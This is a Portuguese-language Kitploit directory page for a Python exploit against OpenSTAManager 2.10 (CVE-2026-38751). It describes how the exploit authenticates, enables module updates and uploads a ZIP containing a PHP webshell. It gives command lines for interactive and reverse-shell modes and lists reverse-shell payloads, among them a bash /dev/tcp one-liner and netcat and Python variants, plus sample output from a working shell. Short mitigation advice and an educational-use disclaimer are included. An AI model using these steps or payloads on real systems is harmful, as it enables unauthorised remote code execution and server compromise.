Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — Exploit RCE OpenSTAManager (CVE-2026-38751) | Kitploit
Ferramentas/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoGeração de Shellcode
GitHub
hackthem/openstamanager_rce_exploit-cve-2026-38751-

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

Exploit RCE OpenSTAManager (CVE-2026-38751)

Ver Repositório
117há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit RCE do OpenSTAManager (CVE-2026-38751)

Visão Geral

Este script Python explora uma vulnerabilidade de Execução Remota de Código no OpenSTAManager versão 2.10, identificada como CVE-2026-38751. O exploit permite que usuários autenticados carreguem um módulo malicioso e executem comandos arbitrários no sistema alvo.

Detalhes da Vulnerabilidade

  • CVE ID: CVE-2026-38751
  • Produto: OpenSTAManager
  • Versão: 2.10
  • Tipo: Execução Remota de Código (RCE)
  • Vetor de Ataque: Baseado na web, requer autenticação válida

Como o Exploit Funciona

O exploit segue os seguintes passos:

  1. Autenticação: Faz login no aplicativo OpenSTAManager usando as credenciais fornecidas
  2. Habilitar Atualizações: Ativa a funcionalidade de atualização de módulos, necessária para o exploit
  3. Criar ZIP Malicioso: Gera um arquivo ZIP contendo:
    • Um arquivo de definição de módulo (MODULE)
    • Um script PHP shell (shell.php) que executa comandos via parâmetro GET c
  4. Carregar Módulo: Envia o ZIP malicioso através da interface de atualização de módulos
  5. Verificar Exploração: Confirma que o shell está acessível e funcional
  6. Executar Comandos: Ou:
    • Modo shell interativo para execução manual de comandos
    • Conexão reverse shell para estabelecer uma conexão persistente

Pré-requisitos

  • Python 3.x
  • Pacotes Python necessários: requests, zipfile
  • Credenciais de administrador válidas para o OpenSTAManager
  • Acesso de rede ao sistema alvo

Uso

Uso Básico

python3 exploit.py -u http://target.com -U admin -P password

Modo Shell Interativo

python3 exploit.py -u http://target.com -U admin -P password --interactive

Modo Reverse Shell

python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444

Argumentos

ArgumentoDescrição
-u, --urlURL alvo (obrigatório)
-U, --userNome de usuário para autenticação (obrigatório)
-P, --passwordSenha para autenticação (obrigatório)
--interactiveEntrar no modo shell interativo
--no-cleanupNão remover arquivos shell após a execução
--lhostHost local para reverse shell
--lportPorta local para reverse shell

Detalhes Técnicos

Processo de Exploração

  1. Autenticação: O script realiza uma requisição de login ao endpoint de autenticação do aplicativo
  2. Habilitação de Atualização de Módulos: Envia uma requisição POST para habilitar a funcionalidade de atualização de módulos
  3. Geração do ZIP: Cria um arquivo ZIP com:
    • shell/MODULE: Arquivo de configuração do módulo
    • shell/shell.php: Webshell PHP que executa comandos passados via parâmetro GET c
  4. Processo de Upload: Usa dados de formulário multipart para enviar o ZIP malicioso ao endpoint de atualização de módulos
  5. Verificação: Testa o shell enviado executando um comando simples como id para confirmar seu funcionamento
  6. Execução de Comandos: Fornece um shell interativo ou estabelece uma conexão reverse shell

Payloads Utilizados

O exploit tenta múltiplos payloads de reverse shell:

  • Shell reverso Bash: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
  • Shells reversos em Python usando conexões socket
  • Payload bash codificado em Base64
  • Shell reverso Netcat

Considerações de Segurança

⚠️ Aviso: Este exploit é destinado apenas para fins educacionais e de testes de segurança autorizados.

Avaliação de Riscos

Esta vulnerabilidade permite:

  • Execução arbitrária de código como o usuário do servidor web
  • Potencial escalada de privilégios
  • Acesso a dados sensíveis armazenados no sistema
  • Possível movimento lateral dentro de uma rede

Mitigação

Para se proteger contra esta vulnerabilidade:

  1. Atualize o OpenSTAManager para a versão mais recente
  2. Implemente controles de autenticação adequados
  3. Restrinja as capacidades de upload de arquivos
  4. Monitore atividades suspeitas
  5. Aplique segmentação de rede

Exemplo de Saída

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami

[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit

Referências

  • Repositório GitHub
  • Detalhes do CVE

Licença

Este exploit é fornecido apenas para fins educacionais. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal.

Baixar ferramenta